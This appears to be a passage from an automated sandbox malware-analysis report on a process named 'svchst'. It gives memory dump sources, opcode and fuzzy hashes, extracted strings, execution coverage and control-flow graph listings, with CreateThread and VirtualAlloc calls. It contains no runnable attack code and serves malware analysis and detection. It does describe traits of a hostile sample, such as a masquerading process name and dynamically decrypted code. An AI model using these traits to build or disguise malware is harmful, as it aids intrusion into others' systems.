                                        • Opcode ID: d8c873859a274da2ae6b17ee2eed40394852dd2b95f5ea685d9cfaea22964491
                                        • Instruction ID: a2ab6347d25f72f3e71f626b10e4d6528701516ee11a1fc663e6044c9a823c6d
                                        • Opcode Fuzzy Hash: d8c873859a274da2ae6b17ee2eed40394852dd2b95f5ea685d9cfaea22964491
                                        • Instruction Fuzzy Hash: C1F04E7590522CCFDB219F20CD48BEDBBB5AB48301F1040DA9809A3261D7350FC4DF61
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0344359be347ea387073513256e3d72d3d9addfdbd7b68cdc82d302d9311124e
                                        • Instruction ID: de7d6b64554b3b5b18193b1f7fae795b3dcdc5174780afe07ea5fcc10a5fc7ab
                                        • Opcode Fuzzy Hash: 0344359be347ea387073513256e3d72d3d9addfdbd7b68cdc82d302d9311124e
                                        • Instruction Fuzzy Hash: 0CE0EC75900208DFC744DFA4E54995DBBB4AB49316F1081A9D80867360C7316E44DB85
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ee40975db3955bf90524346862c70ae748fe5e4a73e01b35c7de466d2a1a193a
                                        • Instruction ID: c43aa6ae1dfc6273a22a26a2b024b25c479aea57215d994e4b5d6e4c3ee8ad05
                                        • Opcode Fuzzy Hash: ee40975db3955bf90524346862c70ae748fe5e4a73e01b35c7de466d2a1a193a
                                        • Instruction Fuzzy Hash: AEE0487590122CDFDB219F90DD88AEEBBB1BB08300F1091D5E50AB6260DB321E86EF00
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1720280829.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5440000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7a3470f1748455036163d250b0cdacd27b39fcfdeb9e286502783d79bae6115
                                        • Instruction ID: beef22622691c747c67fcaf3aa20b44540db7c9f83bb8188f43516ffbf004443
                                        • Opcode Fuzzy Hash: c7a3470f1748455036163d250b0cdacd27b39fcfdeb9e286502783d79bae6115
                                        • Instruction Fuzzy Hash: E9D05EB1C0524C9FCB50DFA5A9086ADBFB4AB01201F5001E9D844323A1D7745A48EB91
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4acece85036ebb2952fc4ff7df4d5692f4875cdf008f5a6ee3142306ac71182a
                                        • Instruction ID: 5da227b483c766e2611ce41ef52389e390732ce031fbaa0cc00cac12bea41d2a
                                        • Opcode Fuzzy Hash: 4acece85036ebb2952fc4ff7df4d5692f4875cdf008f5a6ee3142306ac71182a
                                        • Instruction Fuzzy Hash: 2BD0C7B190521CDFC750DFA9D90C75DBBF8EB05305F1045A5A808E3360D7715E04D751
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d14990c99d7260e057cfbc3aad86fba52980a0c6d9282cbf72fb5af5c943614
                                        • Instruction ID: 9b0eb82cddfb93d2398ef2c1791ddc878b8b9d626447d4d2c0ddfb5413b384ea
                                        • Opcode Fuzzy Hash: 1d14990c99d7260e057cfbc3aad86fba52980a0c6d9282cbf72fb5af5c943614
                                        • Instruction Fuzzy Hash: 0DD0C7E140469C8DEB5157A6B80E7753EB85701319F841465D55C715F2C7A5288CC752
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 24cb2bff959c20ce030e0fd4549eb6e27a70c5715582f9e1540115b2622e1242
                                        • Instruction ID: a47ef7f4e049de8a3ee15f5783f1ef908ff8008b76b12ed7107df870483cb8e9
                                        • Opcode Fuzzy Hash: 24cb2bff959c20ce030e0fd4549eb6e27a70c5715582f9e1540115b2622e1242
                                        • Instruction Fuzzy Hash: B4B022B202030E8FC2202BA2B80C3323AECAB0230AF802820A00C308B08BB0280CC280
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93e8ad7ad8cc12c5f94f98206ca57d19585e588af2840fadb711cc66387d09a3
                                        • Instruction ID: 2ceb4237c85cd69be13c6bcd1133d8135e9e3bc6c1f1c511be6cb61ec42173b8
                                        • Opcode Fuzzy Hash: 93e8ad7ad8cc12c5f94f98206ca57d19585e588af2840fadb711cc66387d09a3
                                        • Instruction Fuzzy Hash: 66C012B05001049FE710DB56CD88BF97775ABC4304F009085A209B2110C7340CC58A14
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57e0acfac9208aba795a86b7164d2c37cda77ef1b30f90b74eb27d254708f6dd
                                        • Instruction ID: 54b381de97ae20fc85f452cf83aa0e076bf57fd2e31da8d6073c81ec0c0831c1
                                        • Opcode Fuzzy Hash: 57e0acfac9208aba795a86b7164d2c37cda77ef1b30f90b74eb27d254708f6dd
                                        • Instruction Fuzzy Hash: EDD0C970905259CFDB80DF89D48879DFBB1EB09311F60589AD40DB2251C371988C8F01
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 292250a9878eb27d2b5fc97db2cfe19efd9cdeac4f99c7868bbbf652b0f0aa41
                                        • Instruction ID: bc3685da3e552b643a920dd30bdb9721bc6f3fc970dafb0c10020f79a7a6655f
                                        • Opcode Fuzzy Hash: 292250a9878eb27d2b5fc97db2cfe19efd9cdeac4f99c7868bbbf652b0f0aa41
                                        • Instruction Fuzzy Hash: 52B09B73045A098FD3552756784C33575645706305F401514650C3087147745454D681
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72cb6cfaf94da4fcee135e87a62f24c026ed18be6c21d65b6982edd6628ec433
                                        • Instruction ID: ff029801e0dcfd4d3082fba35d362f844215392899dca9e01d3246e5d6354a2c
                                        • Opcode Fuzzy Hash: 72cb6cfaf94da4fcee135e87a62f24c026ed18be6c21d65b6982edd6628ec433
                                        • Instruction Fuzzy Hash: F6B09B7204974A4FD5583791B50C33535A45B46305F441521950C3047197B44458D691
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e451327f40dc99dba36aa5052fd701ad74d0b7002f096891691d0cce4152784
                                        • Instruction ID: 3d11376722bde7b2c0393ee5878152e29efa3548d19f8f89f37e43ca2c033e70
                                        • Opcode Fuzzy Hash: 1e451327f40dc99dba36aa5052fd701ad74d0b7002f096891691d0cce4152784
                                        • Instruction Fuzzy Hash: 95C00238A46718CBEB209B10DC8CB9DBB36BB89701F6050C5D80D773A1C6701D89DF00
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 26c056fc8b5ec88d786c27751aa509cf238bc0f43702b2e1ea2be736a41fd882
                                        • Instruction ID: 012a99f43a9bf867bf4989f928c32b9804bd90efca5a7be290f4583f7ab06e52
                                        • Opcode Fuzzy Hash: 26c056fc8b5ec88d786c27751aa509cf238bc0f43702b2e1ea2be736a41fd882
                                        • Instruction Fuzzy Hash: 8CC00235804218CFDF115B51CD88BD8BB76BB48305F1050C5941D762618A350998EF10
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1705214716.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_e80000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L
                                        • API String ID: 0-3065217502
                                        • Opcode ID: fb90a90e6bf9c4052ca1a7f24838981f03c3c31d43f9a3abfe77bdda7d0aab2e
                                        • Instruction ID: 359501c183f0385096926d3403f3297d9d7034e2271e930dda7174d08327f966
                                        • Opcode Fuzzy Hash: fb90a90e6bf9c4052ca1a7f24838981f03c3c31d43f9a3abfe77bdda7d0aab2e
                                        • Instruction Fuzzy Hash: 60F1B0B4A012288FDB64EF28C888B99B7B1FF88304F1491E9D54DA7355DB30AE85CF55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1720280829.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_5440000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L$0L$:
                                        • API String ID: 0-931255965
                                        • Opcode ID: f26f5430d5313f126715177fd910a7ff25e9585b6adbbe0ae1263e90646ad701
                                        • Instruction ID: 81305b7f2304adce9eb85e085630c4c6319c84757a9982c5d144b235313397e3
                                        • Opcode Fuzzy Hash: f26f5430d5313f126715177fd910a7ff25e9585b6adbbe0ae1263e90646ad701
                                        • Instruction Fuzzy Hash: A841F674A51228CFDB28DF69D949AD9B7F2BB49341F1040E6EA09A7754DB309E81CF40

                                        Execution Graph

                                        Execution Coverage:14.8%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:6
                                        Total number of Limit Nodes:0
                                        execution_graph 25719 4f44040 25720 4f4408d CreateThread 25719->25720 25721 4f4410f 25720->25721 25716 4f43e18 25717 4f43e60 VirtualAlloc 25716->25717 25718 4f43ecc 25717->25718

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 26 e28b70-e28b9e 27 e28ba0 26->27 28 e28ba5-e28cc4 26->28 27->28 31 e28cd3-e28cdf 28->31 32 e28cc6-e28ccd call e2b2c2 28->32 33 e28ce1 31->33 34 e28ce6-e28ceb 31->34 32->31 33->34 35 e28d23-e28d6c 34->35 36 e28ced-e28cf9 34->36 46 e28d73-e28f8c 35->46 47 e28d6e 35->47 37 e28d00-e28d1e 36->37 38 e28cfb 36->38 40 e2a1d0-e2a1d6 37->40 38->37 41 e2a201 40->41 42 e2a1d8-e2a1f8 40->42 45 e2a202 41->45 42->41 45->45 68 e299bc-e299c8 46->68 47->46 69 e28f91-e28f9d 68->69 70 e299ce-e29a06 68->70 71 e28fa4-e290c9 69->71 72 e28f9f 69->72 79 e29ab5-e29abb 70->79 106 e290cb-e29103 71->106 107 e29109-e29192 71->107 72->71 80 e29ac1-e29af9 79->80 81 e29a0b-e29a36 79->81 91 e29cf8-e29cfe 80->91 90 e29a42-e29a5d 81->90 92 e29a90-e29ab2 90->92 93 e29a5f-e29a63 90->93 96 e29d04-e29d4c 91->96 97 e29afe-e29c29 91->97 92->79 93->92 95 e29a65-e29a8d 93->95 95->92 103 e29dc7-e29e12 96->103 104 e29d4e-e29dc1 96->104 145 e29c96-e29c9a 97->145 146 e29c2b-e29c94 97->146 124 e2a19a-e2a1a0 103->124 104->103 106->107 133 e291a1-e29225 107->133 134 e29194-e2919c 107->134 128 e2a1a6-e2a1ce 124->128 129 e29e17-e29e99 124->129 128->40 150 e29ec1-e29ecd 129->150 151 e29e9b-e29eb6 129->151 167 e29227-e2922f 133->167 168 e29234-e292b8 133->168 137 e299ad-e299b9 134->137 137->68 148 e29ccc-e29cde 145->148 149 e29c9c-e29cca 145->149 161 e29cdf-e29cf5 146->161 148->161 149->161 152 e29ed4-e29ee0 150->152 153 e29ecf 150->153 151->150 157 e29ee2-e29eee 152->157 158 e29ef3-e29f02 152->158 153->152 162 e2a181-e2a197 157->162 164 e29f04 158->164 165 e29f0b-e2a162 158->165 161->91 162->124 164->165 169 e29f11-e29f4f 164->169 170 e29fd1-e2a03a 164->170 171 e29f54-e29fcc 164->171 172 e2a03f-e2a0a8 164->172 173 e2a0ad-e2a0ea 164->173 195 e2a16d-e2a179 165->195 167->137 207 e292c7-e2934b 168->207 208 e292ba-e292c2 168->208 169->195 170->195 171->195 172->195 194 e2a133-e2a139 173->194 200 e2a13b-e2a145 194->200 201 e2a0ec-e2a11f 194->201 195->162 200->195 204 e2a121 201->204 205 e2a126-e2a130 201->205 204->205 205->194 214 e2935a-e293de 207->214 215 e2934d-e29355 207->215 208->137 221 e293e0-e293e8 214->221 222 e293ed-e29471 214->222 215->137 221->137 228 e29473-e2947b 222->228 229 e29480-e29504 222->229 228->137 235 e29513-e29597 229->235 236 e29506-e2950e 229->236 242 e295a6-e2962a 235->242 243 e29599-e295a1 235->243 236->137 249 e29639-e296bd 242->249 250 e2962c-e29634 242->250 243->137 256 e296bf-e296c7 249->256 257 e296cc-e29750 249->257 250->137 256->137 263 e29752-e2975a 257->263 264 e2975f-e297e3 257->264 263->137 270 e297f2-e29876 264->270 271 e297e5-e297ed 264->271 277 e29885-e29909 270->277 278 e29878-e29880 270->278 271->137 284 e2990b-e29913 277->284 285 e29918-e2999c 277->285 278->137 284->137 291 e299a8-e299aa 285->291 292 e2999e-e299a6 285->292 291->137 292->137
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 2
                                        • API String ID: 0-450215437
                                        • Opcode ID: 83ec26fb35071dacdcafee54e633d2ce93cf954a3ef6b57ea46cab43f7e2826c
                                        • Instruction ID: 006bed441ab6475bf3337b80108b4d746b465811e8e03065b8f53cf12d73a637
                                        • Opcode Fuzzy Hash: 83ec26fb35071dacdcafee54e633d2ce93cf954a3ef6b57ea46cab43f7e2826c
                                        • Instruction Fuzzy Hash: 80D2E0B4A052288FDB64DF69D984B9EB7F6FB88300F1081E9D509AB355DB309E85CF41
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0aa0948115477a781b7e2b28930fc8e0d5945d4443fd5b3dd673491d329861ad
                                        • Instruction ID: 34b9ba20198fe74d94ad7ad87aeefabb28890ddede91d644c265a9f37feb7f99
                                        • Opcode Fuzzy Hash: 0aa0948115477a781b7e2b28930fc8e0d5945d4443fd5b3dd673491d329861ad
                                        • Instruction Fuzzy Hash: C6A2B175A00628CFDB64CF69C984BD9BBB2FF89304F1581E9D509AB265DB319E81CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4399243bba45a0bf75e595822429d14806fd3dfeb6fc794a648f6c755adb220
                                        • Instruction ID: 009a0380419f8012bf2cfdfc0f61aff13bc0a479ae292282bff7a23cd713981f
                                        • Opcode Fuzzy Hash: a4399243bba45a0bf75e595822429d14806fd3dfeb6fc794a648f6c755adb220
                                        • Instruction Fuzzy Hash: 4642C4B4A04229CFDB64DF28D984BADB7B6FB88300F1481E9954DA7355DB30AE81CF54
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a1dde6b4bb14c33812b97bdb6812363619461e187a39882f4c16732c2aa0c89
                                        • Instruction ID: a9d47ef235cecac945981994a38c616dde86953cb0d38b4d46a0621d7cd922dd
                                        • Opcode Fuzzy Hash: 7a1dde6b4bb14c33812b97bdb6812363619461e187a39882f4c16732c2aa0c89
                                        • Instruction Fuzzy Hash: 24C1E0B0D09268CFDB24CFA9D944BDDBBF2AB89314F11A0A9950DAB254D7749EC4CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 368ddd373d82d9097c6e01c1d29103ab6c747ec3c95c1813575470817c262e34
                                        • Instruction ID: 6a2d695433cc61f6f434571f3de36123331500f5ec1da16e27fef98d48c0e6df
                                        • Opcode Fuzzy Hash: 368ddd373d82d9097c6e01c1d29103ab6c747ec3c95c1813575470817c262e34
                                        • Instruction Fuzzy Hash: 0A816EB0A043098FD709EF7AE98079EBBF2BFC9300F14C169D1099B265EB701906DB51
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9062ff2ef1a0b1d07f438fc44e73de916b2c38d32b3dfe6cf6da78f1c2b52dd8
                                        • Instruction ID: cf8df662e5a317db32e2532141233cf8956d49a462ca639453784483306e1a96
                                        • Opcode Fuzzy Hash: 9062ff2ef1a0b1d07f438fc44e73de916b2c38d32b3dfe6cf6da78f1c2b52dd8
                                        • Instruction Fuzzy Hash: E751B9B1E056188BEB18DF6BD94579AFAF3BFC8300F14C1AAC508AA265DB704941CF55
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1339af98b219569ddbde017be68250f32b6c9bdf7b92cde7b879e5a60e86ef53
                                        • Instruction ID: 5998c297fbfde72bf3a53b5950831b7caa9f1c1b332a79c6127cea6f478a352b
                                        • Opcode Fuzzy Hash: 1339af98b219569ddbde017be68250f32b6c9bdf7b92cde7b879e5a60e86ef53
                                        • Instruction Fuzzy Hash: F721B671D05618CBEB18CFAAC94479EBBF7BF88300F14C07A8419AB265EBB05546CF41

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 53171d0-53171d7 1 531e417-531e452 0->1 2 53171dd-53171de 0->2 7 531e45a-531e461 1->7 2->1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0$Y
                                        • API String ID: 0-947205236
                                        • Opcode ID: 3bfaa2f4c17a65efab1055731a36c545b6160df4ea085add10ca1a6d057d9174
                                        • Instruction ID: 237daefa6c22f7184fc9996cf7eef33125ad712290e6aa4f4b20aa6c3eb2d687
                                        • Opcode Fuzzy Hash: 3bfaa2f4c17a65efab1055731a36c545b6160df4ea085add10ca1a6d057d9174
                                        • Instruction Fuzzy Hash: A1F0F8349512288FEB28EF20C8A9BA9777ABF44345F400098D50A67290DF305D84DF04

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 8 5310506-531053f 11 5310545-5310550 8->11 12 53100fc-5310107 8->12 11->12 13 5310110-5310389 12->13 14 5310109-531452c call 532ff80 12->14 13->12 22 531038f-531039a 13->22 18 5314532-5314574 14->18 18->12 24 531457a-5314585 18->24 22->12 24->12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: X$h
                                        • API String ID: 0-795848406
                                        • Opcode ID: 45006fca060642a1aa4df5e427c67e0b23660675409c93277fcac895ec81e147
                                        • Instruction ID: 8942e6dc1d5b201ba55e6c170112a69fbb1b64b9580cf5c13e901e4d9c9b78ea
                                        • Opcode Fuzzy Hash: 45006fca060642a1aa4df5e427c67e0b23660675409c93277fcac895ec81e147
                                        • Instruction Fuzzy Hash: DCF0C974950229CFDB3CDF24C959B9AB7B2BB04305F0044E5D90963680E7754EC8DF05

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 619 4f44039-4f4410d CreateThread 621 4f44116-4f4414e 619->621 622 4f4410f-4f44115 619->622 622->621
                                        APIs
                                        • CreateThread.KERNELBASE(?,?,?,?,?,?), ref: 04F440FD
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2736219431.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_4f40000_svchst.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: 1657b9114d622877004fd7e47d8859ad9806bee49b39fb82d1f1dad5bd361af4
                                        • Instruction ID: 0bd9c664dfb2696b500434a96b49fdd1d2500ea75611ed59e94bc092dcb40013
                                        • Opcode Fuzzy Hash: 1657b9114d622877004fd7e47d8859ad9806bee49b39fb82d1f1dad5bd361af4
                                        • Instruction Fuzzy Hash: 3C4168B9D042589FCF10CFA9E984ADEFBB1BB59310F14902AE814B7310D775A946CB64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 625 4f44040-4f4410d CreateThread 627 4f44116-4f4414e 625->627 628 4f4410f-4f44115 625->628 628->627
                                        APIs
                                        • CreateThread.KERNELBASE(?,?,?,?,?,?), ref: 04F440FD
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2736219431.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_4f40000_svchst.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: 14b395abb8bcffa738ec36aab4bcf6ddefbb35962c470f45245aae0e2deca75e
                                        • Instruction ID: 33eae36f9e0a1aa1cc6ef6791abfeb9422145569a258220ce2d2e3e1d431c612
                                        • Opcode Fuzzy Hash: 14b395abb8bcffa738ec36aab4bcf6ddefbb35962c470f45245aae0e2deca75e
                                        • Instruction Fuzzy Hash: 6E4168B9D042589FCF10CFA9E980A9EFBF1BB49310F14902AE814B7310D775A945CF64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !
                                        • API String ID: 0-2657877971
                                        • Opcode ID: a9ffab7ef867c46e28a018d0cc1993f4d859fbe7b1b02ed5e408b6fdbcae0650
                                        • Instruction ID: 7253a1fc488ceacb518a7a3b3b4f6bea5fb2931762065dda3e88201eaef8e4c7
                                        • Opcode Fuzzy Hash: a9ffab7ef867c46e28a018d0cc1993f4d859fbe7b1b02ed5e408b6fdbcae0650
                                        • Instruction Fuzzy Hash: F9A1BEB490A268CFDB60CFA8D984BDCBBF1AB49314F11A095D54DAB255C7749EC8CF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 820 e219ea 821 e219f6-e21a25 820->821 822 e21a27-e21a3d 821->822 823 e21a3f-e21a4b 821->823 824 e21a55-e21a69 822->824 823->824 863 e21a6f call e26148 824->863 864 e21a6f call e26138 824->864 825 e21a75-e21a83 867 e21a89 call e26dc0 825->867 868 e21a89 call e26db0 825->868 869 e21a89 call e26e48 825->869 826 e21a8f-e21aa0 827 e21aa2 826->827 828 e21aa7-e21ab5 826->828 827->828 829 e21ab7 828->829 830 e21abc-e21aca 828->830 829->830 831 e21ad1-e21adf 830->831 832 e21acc 830->832 833 e21ae1 831->833 834 e21ae6-e21b2e 831->834 832->831 833->834 837 e21b30 834->837 838 e21b35-e21b43 834->838 837->838 839 e21b45 838->839 840 e21b4a-e21b58 838->840 839->840 841 e21b5a 840->841 842 e21b5f-e21b6d 840->842 841->842 843 e21b74-e21b82 842->843 844 e21b6f 842->844 845 e21b84 843->845 846 e21b89-e21b97 843->846 844->843 845->846 847 e21b99 846->847 848 e21b9e-e21bac 846->848 847->848 849 e21bb3-e21bc1 848->849 850 e21bae 848->850 851 e21bc3 849->851 852 e21bc8-e21be5 849->852 850->849 851->852 854 e21bf1-e21c17 852->854 865 e21c1d call e26148 854->865 866 e21c1d call e26138 854->866 855 e21c23 856 e21c2f-e21c44 855->856 870 e21c4a call e26148 856->870 871 e21c4a call e26138 856->871 857 e21c50-e21ca9 860 e219c6-e219db 857->860 861 e21caf-e21cb0 857->861 860->820 863->825 864->825 865->855 866->855 867->826 868->826 869->826 870->857 871->857
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `
                                        • API String ID: 0-2679148245
                                        • Opcode ID: 8469cff7384d7e73f982ded6dd288e7a41e1979a2005b6ca0c76ad95b94be86f
                                        • Instruction ID: 01989f63155fc077bf987636f7ffe2b8e29092edcd89b85a363451afa9542dd5
                                        • Opcode Fuzzy Hash: 8469cff7384d7e73f982ded6dd288e7a41e1979a2005b6ca0c76ad95b94be86f
                                        • Instruction Fuzzy Hash: E681D374902268DFEB30DB28D988BCEBBB1AF59301F1580D9D04DAB261CB349E84CF55

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 872 4f43e10-4f43eca VirtualAlloc 874 4f43ed3-4f43f07 872->874 875 4f43ecc-4f43ed2 872->875 875->874
                                        APIs
                                        • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04F43EBA
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2736219431.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_4f40000_svchst.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
